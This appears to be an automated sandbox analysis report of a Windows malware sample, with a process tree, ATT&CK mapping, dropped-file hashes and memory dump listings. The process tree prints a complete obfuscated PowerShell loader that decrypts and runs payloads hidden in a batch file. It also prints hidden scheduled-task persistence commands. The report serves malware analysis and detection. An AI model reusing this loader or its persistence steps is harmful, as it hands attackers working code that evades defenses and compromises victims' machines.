c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2456

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2464

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2508

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2692

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2704

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2736

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2760

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2768

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2860

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3024

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3092

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:4788

C:\Windows\system32\net.exe
net file
3⤵
- Suspicious use of WriteProcessMemory
PID:3920

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
4⤵
PID:312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_126_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_126.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_126.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:4680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_126.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:3180

C:\Windows\SysWOW64\net.exe
net file
6⤵
- Suspicious use of WriteProcessMemory
PID:3172

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 file
7⤵
PID:1472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_126.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_126.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1484

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:2376

C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe
"C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1580

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:1328

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
7⤵
- Executes dropped EXE
PID:4352

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3948

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4112

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:4868

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:424

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:3452

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:4844

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1160

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:2836

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:2448

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:960

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
1⤵
PID:3896

C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4184

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ac3d19fbb5c5f10833f1882308f77548

SHA1
ac880466fd99a5719fedc7289b00d78ba7088e06

SHA256
3353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df

SHA512
b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
c30ea8b62755bc886dc0dcf1bc972fab

SHA1
db5b2bbf369dd6329a059aa20baba52f84ea7f29

SHA256
1ee2e14edf10a952588fed9b05a88358772c364d75bcfd1c4420b506f9eb13f5

SHA512
e596cb38e4c28dc359decc9fd76aaaa72b855a8193d10746f2323c7ba7a071441e38b8540f125aea4b7f862eea00fcec8b936b8fa7cbbcfc261884364f374eec

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ddsmgbvo.4z1.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.exe

Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe

Filesize
420KB

MD5
be8ffebe1c4b5e18a56101a3c0604ea0

SHA1
2ec8af7c1538974d64291845dcb02111b907770f

SHA256
d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5

SHA512
71008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_126.bat

Filesize
515KB

MD5
4c2a3be3d5c9464eb441677e41f44fd8

SHA1
c826034a0882d21a39056d745e88622ee9698343

SHA256
45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7

SHA512
ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_126.vbs

Filesize
115B

MD5
4b94d8130c68f5739f16fc207ea8448f

SHA1
9abc01c1d21662167df43e10a8f8c159a48ee95e

SHA256
fdc9a2c2567c6c817a36bf2036a9551ce000c15fed09f0f8078d0865d6719e7c

SHA512
fef4f1069e63307189ab9c1f3f16a3fdc4d6a33bc831902363d36f5396cf4689bc215506717e9b758723b89d3b9bb649465a0e14d832ec1e820c18aacd0b675e

Download Submit
memory/588-302-0x000001BBCD240000-0x000001BBCD265000-memory.dmp

Filesize
148KB

Download
memory/588-303-0x000001BBCD270000-0x000001BBCD29B000-memory.dmp

Filesize
172KB

Download
memory/588-304-0x000001BBCD270000-0x000001BBCD29B000-memory.dmp

Filesize
172KB

Download
memory/588-311-0x00007FFA17970000-0x00007FFA17980000-memory.dmp

Filesize
64KB

Download
memory/588-310-0x000001BBCD270000-0x000001BBCD29B000-memory.dmp

Filesize
172KB

Download
memory/644-315-0x0000024DACC70000-0x0000024DACC9B000-memory.dmp

Filesize
172KB

Download
memory/644-322-0x00007FFA17970000-0x00007FFA17980000-memory.dmp

Filesize
64KB

Download
memory/644-321-0x0000024DACC70000-0x0000024DACC9B000-memory.dmp

Filesize
172KB

Download
memory/748-332-0x00000256CA910000-0x00000256CA93B000-memory.dmp

Filesize
172KB

Download
memory/748-326-0x00000256CA910000-0x00000256CA93B000-memory.dmp

Filesize
172KB

Download
memory/748-333-0x00007FFA17970000-0x00007FFA17980000-memory.dmp

Filesize
64KB

Download
memory/920-337-0x0000016BA17C0000-0x0000016BA17EB000-memory.dmp

Filesize
172KB

Download
memory/920-344-0x00007FFA17970000-0x00007FFA17980000-memory.dmp

Filesize
64KB

Download
memory/920-343-0x0000016BA17C0000-0x0000016BA17EB000-memory.dmp

Filesize
172KB

Download
memory/1004-348-0x000001F714E80000-0x000001F714EAB000-memory.dmp

Filesize
172KB

Download
memory/1484-199-0x0000000009770000-0x00000000097DC000-memory.dmp

Filesize
432KB

Download
memory/1484-196-0x0000000009660000-0x00000000096C2000-memory.dmp

Filesize
392KB

Download
memory/1484-203-0x0000000007180000-0x0000000007192000-memory.dmp

Filesize
72KB

Download
memory/1484-204-0x00000000098B0000-0x00000000098EE000-memory.dmp

Filesize
248KB

Download
memory/1484-200-0x0000000009930000-0x00000000099C2000-memory.dmp

Filesize
584KB

Download
memory/1580-245-0x0000000007F60000-0x0000000007F9C000-memory.dmp

Filesize
240KB

Download
memory/1676-72-0x0000000009DD0000-0x0000000009E64000-memory.dmp

Filesize
592KB

Download
memory/1676-47-0x00000000740B0000-0x000000007479E000-memory.dmp

Filesize
6.9MB

Download
memory/1676-46-0x00000000740B0000-0x000000007479E000-memory.dmp

Filesize
6.9MB

Download
memory/1676-45-0x00000000740B0000-0x000000007479E000-memory.dmp

Filesize
6.9MB

Download
memory/1676-64-0x0000000009AB0000-0x0000000009AE3000-memory.dmp

Filesize
204KB

Download
memory/1676-164-0x00000000740B0000-0x000000007479E000-memory.dmp

Filesize
6.9MB

Download
memory/1676-65-0x0000000070C90000-0x0000000070CDB000-memory.dmp

Filesize
300KB

Download
memory/1676-71-0x0000000009C30000-0x0000000009CD5000-memory.dmp

Filesize
660KB

Download
memory/1676-66-0x0000000009A90000-0x0000000009AAE000-memory.dmp

Filesize
120KB

Download
memory/3148-287-0x00007FFA54E40000-0x00007FFA54EEE000-memory.dmp

Filesize
696KB

Download
memory/3148-286-0x00007FFA578E0000-0x00007FFA57ABB000-memory.dmp

Filesize
1.9MB

Download
memory/3148-260-0x000001EEBA3A0000-0x000001EEBA3C2000-memory.dmp

Filesize
136KB

Download
memory/3148-263-0x000001EED2A10000-0x000001EED2A86000-memory.dmp

Filesize
472KB

Download
memory/3148-285-0x000001EED2D90000-0x000001EED2DBA000-memory.dmp

Filesize
168KB

Download
memory/4960-288-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4960-299-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4960-290-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4960-297-0x00007FFA578E0000-0x00007FFA57ABB000-memory.dmp

Filesize
1.9MB

Download
memory/4960-298-0x00007FFA54E40000-0x00007FFA54EEE000-memory.dmp

Filesize
696KB

Download
memory/4960-294-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4960-291-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4960-289-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5076-0-0x00000000740BE000-0x00000000740BF000-memory.dmp

Filesize
4KB

Download
memory/5076-31-0x0000000009590000-0x0000000009C08000-memory.dmp

Filesize
6.5MB

Download
memory/5076-26-0x00000000740B0000-0x000000007479E000-memory.dmp

Filesize
6.9MB

Download
memory/5076-15-0x0000000007CF0000-0x0000000007D66000-memory.dmp

Filesize
472KB

Download
memory/5076-14-0x0000000007FA0000-0x0000000007FEB000-memory.dmp

Filesize
300KB

Download
memory/5076-13-0x0000000007430000-0x000000000744C000-memory.dmp

Filesize
112KB

Download
memory/5076-10-0x00000000076D0000-0x0000000007A20000-memory.dmp

Filesize
3.3MB

Download
memory/5076-9-0x0000000007660000-0x00000000076C6000-memory.dmp

Filesize
408KB

Download
memory/5076-8-0x00000000075F0000-0x0000000007656000-memory.dmp

Filesize
408KB

Download
memory/5076-7-0x0000000006CE0000-0x0000000006D02000-memory.dmp

Filesize
136KB

Download
memory/5076-4-0x00000000740B0000-0x000000007479E000-memory.dmp

Filesize
6.9MB

Download
memory/5076-6-0x00000000740B0000-0x000000007479E000-memory.dmp

Filesize
6.9MB

Download
memory/5076-5-0x0000000006D70000-0x0000000007398000-memory.dmp

Filesize
6.2MB

Download
memory/5076-3-0x0000000001150000-0x0000000001186000-memory.dmp

Filesize
216KB

Download
memory/5076-32-0x0000000008D10000-0x0000000008D2A000-memory.dmp

Filesize
104KB

Download
memory/5076-33-0x00000000007F0000-0x00000000007F8000-memory.dmp

Filesize
32KB

Download
memory/5076-34-0x0000000008DB0000-0x0000000008E12000-memory.dmp

Filesize
392KB

Download
memory/5076-35-0x000000000AC10000-0x000000000B10E000-memory.dmp

Filesize
5.0MB

Download
memory/5076-202-0x00000000740B0000-0x000000007479E000-memory.dmp

Filesize
6.9MB

Download